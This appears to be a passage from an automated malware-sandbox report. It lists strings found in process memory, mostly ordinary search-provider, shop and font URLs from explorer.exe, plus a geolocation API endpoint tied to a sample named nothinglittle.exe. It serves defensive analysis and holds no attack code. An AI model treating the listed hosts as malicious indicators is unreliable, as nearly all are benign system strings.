Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460487626.000000000E7C0000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: nothinglittle.exe String found in binary or memory: http://us1.unwiredlabs.com/v2/process.php
Source: nothinglittle.exe.9.dr String found in binary or memory: http://us1.unwiredlabs.com/v2/process.php?application/json;
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001D.00000000.460487626.000000000E7C0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.283225202.00000000050E1000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp1
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpg
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpT
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
